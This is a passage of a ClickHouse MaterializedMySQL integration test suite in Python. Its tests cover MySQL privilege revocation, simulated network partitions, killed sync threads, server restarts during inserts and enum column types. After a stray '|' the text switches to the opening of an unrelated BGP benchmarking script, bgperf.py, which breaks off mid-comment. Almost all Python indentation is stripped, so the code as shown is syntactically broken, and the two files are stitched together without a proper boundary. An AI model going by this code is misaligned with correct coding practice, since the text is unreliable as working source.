clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DETACH DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
time.sleep(3)
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query("ATTACH DATABASE priv_err_db")
assert 'MySQL SYNC USER ACCESS ERR:' in str(exception.value)
assert "priv_err_db" not in clickhouse_node.query("SHOW DATABASES")
mysql_node.query("GRANT SELECT ON priv_err_db.* TO 'test'@'%'")
time.sleep(3)
clickhouse_node.query("ATTACH DATABASE priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
mysql_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("DROP USER 'test'@'%'")
def restore_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._delete_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._delete_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def drop_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._add_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._add_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def network_partition_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_network")
clickhouse_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("DROP DATABASE IF EXISTS test_database_network")
mysql_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("CREATE DATABASE test_database_network;")
mysql_node.query("CREATE TABLE test_database_network.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("CREATE DATABASE test;")
clickhouse_node.query(
"CREATE DATABASE test_database_network ENGINE = MaterializedMySQL('{}:3306', 'test_database_network', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with PartitionManager() as pm:
drop_instance_mysql_connections(clickhouse_node, pm)
mysql_node.query('INSERT INTO test_database_network.test_table VALUES(1)')
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
assert "Can't connect to MySQL server" in str(exception.value)
restore_instance_mysql_connections(clickhouse_node, pm)
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table FORMAT TSV", '1\n')
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_database_network FORMAT TSV", "test_table\n")
mysql_node.query("CREATE TABLE test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test FORMAT TSV", "test\n")
clickhouse_node.query("DROP DATABASE test_database_network")
clickhouse_node.query("DROP DATABASE test")
mysql_node.query("DROP DATABASE test_database_network")
mysql_node.query("DROP DATABASE test")
def mysql_kill_sync_thread_restore_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database;")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("DROP DATABASE IF EXISTS test_database;")
mysql_node.query("CREATE DATABASE test_database;")
mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table VALUES (1)")
mysql_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("CREATE DATABASE test_database_auto;")
mysql_node.query("CREATE TABLE test_database_auto.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (11)")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
clickhouse_node.query("CREATE DATABASE test_database_auto ENGINE = MaterializedMySQL('{}:3306', 'test_database_auto', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table FORMAT TSV", '11\n')
    # Once ClickHouse has dumped all of the historical data we can query it on the ClickHouse side,
    # but that does not mean the sync thread has already connected to MySQL.
    # So after ClickHouse can serve the data, insert a few more rows into MySQL and use them to
    # re-check that the sync succeeded.
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (22)")
mysql_node.query("INSERT INTO test_database.test_table VALUES (2)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n')
get_sync_id_query = "SELECT id FROM information_schema.processlist WHERE state LIKE '% has sent all binlog to % waiting for more updates%';"
result = mysql_node.query_and_get_data(get_sync_id_query)
assert len(result) > 0
for row in result:
query = "kill " + str(row[0]) + ";"
mysql_node.query(query)
with pytest.raises(QueryRuntimeException, match="Cannot read all data"):
# https://dev.mysql.com/doc/refman/5.7/en/kill.html
# When you use KILL, a thread-specific kill flag is set for the thread.
# In most cases, it might take some time for the thread to die because the kill flag is checked only at specific intervals.
for sleep_time in [1, 3, 5]:
time.sleep(sleep_time)
clickhouse_node.query("SELECT * FROM test_database.test_table")
clickhouse_node.query("DETACH DATABASE test_database")
clickhouse_node.query("ATTACH DATABASE test_database")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
mysql_node.query("INSERT INTO test_database.test_table VALUES (3)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n3\n')
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (33)")
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n33\n')
clickhouse_node.query("DROP DATABASE test_database")
clickhouse_node.query("DROP DATABASE test_database_auto")
mysql_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database_auto")
def mysql_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
mysql_node.query("CREATE DATABASE kill_mysql_while_insert")
mysql_node.query("CREATE TABLE kill_mysql_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_mysql_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_mysql_while_insert', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_mysql_while_insert FORMAT TSV", 'test\n')
try:
def insert(num):
for i in range(num):
query = "INSERT INTO kill_mysql_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(10000,))
t.start()
clickhouse_node.cluster.restart_service(service_name)
finally:
with pytest.raises(QueryRuntimeException) as exception:
time.sleep(2)
clickhouse_node.query("SELECT count() FROM kill_mysql_while_insert.test")
mysql_node.alloc_connection()
clickhouse_node.query("DETACH DATABASE kill_mysql_while_insert")
clickhouse_node.query("ATTACH DATABASE kill_mysql_while_insert")
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_mysql_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_mysql_while_insert.test", res)
mysql_node.query("DROP DATABASE kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE kill_mysql_while_insert")
def clickhouse_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_clickhouse_while_insert")
mysql_node.query("CREATE DATABASE kill_clickhouse_while_insert")
mysql_node.query("CREATE TABLE kill_clickhouse_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_clickhouse_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_clickhouse_while_insert', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_clickhouse_while_insert FORMAT TSV", 'test\n')
def insert(num):
for i in range(num):
query = "INSERT INTO kill_clickhouse_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(1000,))
t.start()
# TODO: add clickhouse_node.restart_clickhouse(20, kill=False) test
clickhouse_node.restart_clickhouse(20, kill=True)
t.join()
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_clickhouse_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_clickhouse_while_insert.test FORMAT TSV", res)
mysql_node.query("DROP DATABASE kill_clickhouse_while_insert")
clickhouse_node.query("DROP DATABASE kill_clickhouse_while_insert")
def utf8mb4_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
clickhouse_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
mysql_node.query("CREATE DATABASE utf8mb4_test")
mysql_node.query("CREATE TABLE utf8mb4_test.test (id INT(11) NOT NULL PRIMARY KEY, name VARCHAR(255)) ENGINE=InnoDB DEFAULT CHARACTER SET utf8mb4")
mysql_node.query("INSERT INTO utf8mb4_test.test VALUES(1, '🦄'),(2, '\u2601')")
clickhouse_node.query("CREATE DATABASE utf8mb4_test ENGINE = MaterializedMySQL('{}:3306', 'utf8mb4_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM utf8mb4_test FORMAT TSV", "test\n")
check_query(clickhouse_node, "SELECT id, name FROM utf8mb4_test.test ORDER BY id", "1\t\U0001F984\n2\t\u2601\n")
def system_parts_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_parts_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_parts_test")
mysql_node.query("CREATE DATABASE system_parts_test")
mysql_node.query("CREATE TABLE system_parts_test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO system_parts_test.test VALUES(1),(2),(3)")
def check_active_parts(num):
check_query(clickhouse_node, "SELECT count() FROM system.parts WHERE database = 'system_parts_test' AND table = 'test' AND active = 1", "{}\n".format(num))
clickhouse_node.query("CREATE DATABASE system_parts_test ENGINE = MaterializedMySQL('{}:3306', 'system_parts_test', 'root', 'clickhouse')".format(service_name))
check_active_parts(1)
mysql_node.query("INSERT INTO system_parts_test.test VALUES(4),(5),(6)")
check_active_parts(2)
clickhouse_node.query("OPTIMIZE TABLE system_parts_test.test")
check_active_parts(1)
def multi_table_update_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS multi_table_update")
clickhouse_node.query("DROP DATABASE IF EXISTS multi_table_update")
mysql_node.query("CREATE DATABASE multi_table_update")
mysql_node.query("CREATE TABLE multi_table_update.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("CREATE TABLE multi_table_update.b (id INT(11) NOT NULL PRIMARY KEY, othervalue VARCHAR(255))")
mysql_node.query("INSERT INTO multi_table_update.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO multi_table_update.b VALUES(1, 'bar')")
clickhouse_node.query("CREATE DATABASE multi_table_update ENGINE = MaterializedMySQL('{}:3306', 'multi_table_update', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM multi_table_update", "a\nb\n")
mysql_node.query("UPDATE multi_table_update.a, multi_table_update.b SET value='baz', othervalue='quux' where a.id=b.id")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.a", "1\tbaz\n")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.b", "1\tquux\n")
def system_tables_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_tables_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_tables_test")
mysql_node.query("CREATE DATABASE system_tables_test")
mysql_node.query("CREATE TABLE system_tables_test.test (id int NOT NULL PRIMARY KEY) ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE system_tables_test ENGINE = MaterializedMySQL('{}:3306', 'system_tables_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT partition_key, sorting_key, primary_key FROM system.tables WHERE database = 'system_tables_test' AND name = 'test'", "intDiv(id, 4294967)\tid\tid\n")
def materialize_with_column_comments_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
mysql_node.query("CREATE DATABASE materialize_with_column_comments_test")
mysql_node.query("CREATE TABLE materialize_with_column_comments_test.test (id int NOT NULL PRIMARY KEY, value VARCHAR(255) COMMENT 'test comment') ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE materialize_with_column_comments_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_column_comments_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\ttest comment\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test MODIFY value VARCHAR(255) COMMENT 'comment test'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test ADD value2 int COMMENT 'test comment 2'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\nvalue2\tNullable(Int32)\t\t\ttest comment 2\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_column_comments_test")
mysql_node.query("DROP DATABASE materialize_with_column_comments_test")
def materialize_with_enum8_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
mysql_node.query("CREATE DATABASE materialize_with_enum8_test")
enum8_values_count = 127
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum8_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum8_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum8_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (3, '127')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n127\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum8_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum8_test")
mysql_node.query("DROP DATABASE materialize_with_enum8_test")
def materialize_with_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
mysql_node.query("CREATE DATABASE materialize_with_enum16_test")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum16_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum16_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (3, '500')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n500\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum16_test")
mysql_node.query("DROP DATABASE materialize_with_enum16_test")
def alter_enum8_to_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
mysql_node.query("CREATE DATABASE alter_enum8_to_enum16_test")
enum8_values_count = 100
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE alter_enum8_to_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE alter_enum8_to_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'alter_enum8_to_enum16_test', 'root', 'clickhouse')".format(service_name))
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (3, '75')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("ALTER TABLE alter_enum8_to_enum16_test.test MODIFY COLUMN value ENUM(" + enum16_values + ")")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (4, '500')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n500\n")
clickhouse_node.query("DROP DATABASE alter_enum8_to_enum16_test")
mysql_node.query("DROP DATABASE alter_enum8_to_enum16_test")
def move_to_prewhere_and_column_filtering(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("CREATE DATABASE cond_on_key_col")
clickhouse_node.query("CREATE DATABASE cond_on_key_col ENGINE = MaterializedMySQL('{}:3306', 'cond_on_key_col', 'root', 'clickhouse')".format(service_name))
mysql_node.query("create table cond_on_key_col.products (id int primary key, product_id int not null, catalog_id int not null, brand_id int not null, name text)")
mysql_node.query("insert into cond_on_key_col.products (id, name, catalog_id, brand_id, product_id) values (915, 'ertyui', 5287, 15837, 0), (990, 'wer', 1053, 24390, 1), (781, 'qwerty', 1041, 1176, 2);")
mysql_node.query("create table cond_on_key_col.test (id int(11) NOT NULL AUTO_INCREMENT, a int(11) DEFAULT NULL, b int(11) DEFAULT NULL, PRIMARY KEY (id)) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;")
mysql_node.query("insert into cond_on_key_col.test values (42, 123, 1);")
mysql_node.query("CREATE TABLE cond_on_key_col.balance_change_record (id bigint(20) NOT NULL AUTO_INCREMENT, type tinyint(4) DEFAULT NULL, value decimal(10,4) DEFAULT NULL, time timestamp NULL DEFAULT NULL, "
"initiative_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, passivity_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"person_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, tenant_code varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"created_time timestamp NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', updated_time timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, "
"value_snapshot decimal(10,4) DEFAULT NULL, PRIMARY KEY (id), KEY balance_change_record_initiative_id (person_id) USING BTREE, "
"KEY type (type) USING BTREE, KEY balance_change_record_type (time) USING BTREE, KEY initiative_id (initiative_id) USING BTREE, "
"KEY balance_change_record_tenant_code (passivity_id) USING BTREE, KEY tenant_code (tenant_code) USING BTREE) ENGINE=InnoDB AUTO_INCREMENT=1691049 DEFAULT CHARSET=utf8")
mysql_node.query("insert into cond_on_key_col.balance_change_record values (123, 1, 3.14, null, 'qwe', 'asd', 'zxc', 'rty', null, null, 2.7);")
mysql_node.query("CREATE TABLE cond_on_key_col.test1 (id int(11) NOT NULL AUTO_INCREMENT, c1 varchar(32) NOT NULL, c2 varchar(32), PRIMARY KEY (id)) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4")
mysql_node.query("insert into cond_on_key_col.test1(c1,c2) values ('a','b'), ('c', null);")
check_query(clickhouse_node, "SELECT DISTINCT P.id, P.name, P.catalog_id FROM cond_on_key_col.products P WHERE P.name ILIKE '%e%' and P.catalog_id=5287", '915\tertyui\t5287\n')
check_query(clickhouse_node, "select count(a) from cond_on_key_col.test where b = 1;", "1\n")
check_query(clickhouse_node, "select id from cond_on_key_col.balance_change_record where type=1;", "123\n")
check_query(clickhouse_node, "select count(c1) from cond_on_key_col.test1 where c2='b';", "1\n")
clickhouse_node.query("DROP DATABASE cond_on_key_col")
mysql_node.query("DROP DATABASE cond_on_key_col")
def mysql_settings_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database")
mysql_node.query("CREATE TABLE test_database.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("INSERT INTO test_database.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO test_database.a VALUES(2, 'bar')")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM test_database.a FORMAT TSV", "2\n")
assert clickhouse_node.query("SELECT COUNT(DISTINCT blockNumber()) FROM test_database.a FORMAT TSV") == "2\n"
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_large_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS largetransaction")
clickhouse_node.query("DROP DATABASE IF EXISTS largetransaction")
mysql_node.query("CREATE DATABASE largetransaction")
mysql_node.query("CREATE TABLE largetransaction.test_table ("
"`key` INT NOT NULL PRIMARY KEY AUTO_INCREMENT, "
"`value` INT NOT NULL) ENGINE = InnoDB;")
num_rows = 200000
rows_per_insert = 5000
values = ",".join(["(1)" for _ in range(rows_per_insert)])
for i in range(num_rows//rows_per_insert):
mysql_node.query(f"INSERT INTO largetransaction.test_table (`value`) VALUES {values};")
clickhouse_node.query("CREATE DATABASE largetransaction ENGINE = MaterializedMySQL('{}:3306', 'largetransaction', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table", f"{num_rows}\n")
mysql_node.query("UPDATE largetransaction.test_table SET value = 2;")
# Attempt to restart clickhouse after it has started processing
# the transaction, but before it has completed it.
while int(clickhouse_node.query("SELECT COUNT() FROM largetransaction.test_table WHERE value = 2")) == 0:
time.sleep(0.2)
clickhouse_node.restart_clickhouse()
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table WHERE value = 2", f"{num_rows}\n")
clickhouse_node.query("DROP DATABASE largetransaction")
mysql_node.query("DROP DATABASE largetransaction")
def table_table(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS table_test")
clickhouse_node.query("DROP DATABASE IF EXISTS table_test")
mysql_node.query("CREATE DATABASE table_test")
# Test that the table name 'table' works as expected
mysql_node.query("CREATE TABLE table_test.table (id INT UNSIGNED PRIMARY KEY)")
mysql_node.query("INSERT INTO table_test.table VALUES (0),(1),(2),(3),(4)")
clickhouse_node.query("CREATE DATABASE table_test ENGINE=MaterializeMySQL('{}:3306', 'table_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT(*) FROM table_test.table", "5\n")
mysql_node.query("DROP DATABASE table_test")
clickhouse_node.query("DROP DATABASE table_test")
|
bgperf.py
|
#!/usr/bin/env python3
#
# Copyright (C) 2015, 2016 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import sys
import yaml
import time
import shutil
import netaddr
import datetime
from collections import defaultdict
from argparse import ArgumentParser, REMAINDER
from itertools import chain, islice
from requests.exceptions import ConnectionError
from pyroute2 import IPRoute
from socket import AF_INET
from nsenter import Namespace
from psutil import virtual_memory
from subprocess import check_output
import matplotlib.pyplot as plt
import numpy as np
from base import *
from exabgp import ExaBGP, ExaBGP_MRTParse
from gobgp import GoBGP, GoBGPTarget
from bird import BIRD, BIRDTarget
from frr import FRRouting, FRRoutingTarget
from frr_compiled import FRRoutingCompiled, FRRoutingCompiledTarget
from rustybgp import RustyBGP, RustyBGPTarget
from openbgp import OpenBGP, OpenBGPTarget
from tester import ExaBGPTester, BIRDTester
from mrt_tester import GoBGPMRTTester, ExaBGPMrtTester
from bgpdump2 import Bgpdump2, Bgpdump2Tester
from monitor import Monitor
from settings import dckr
from queue import Queue
from mako.template import Template
from packaging import version
from docker.types import IPAMConfig, IPAMPool
import re
from threading import Thread
def gen_mako_macro():
return '''<%
import netaddr
from itertools import islice
it = netaddr.iter_iprange('100.0.0.0','160.0.0.0')
def gen_paths(num):
return list('{0}/32'.format(ip) for ip in islice(it, num))
%>
'''
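# For reference: after rendering the macro above, gen_paths(3) would yield something
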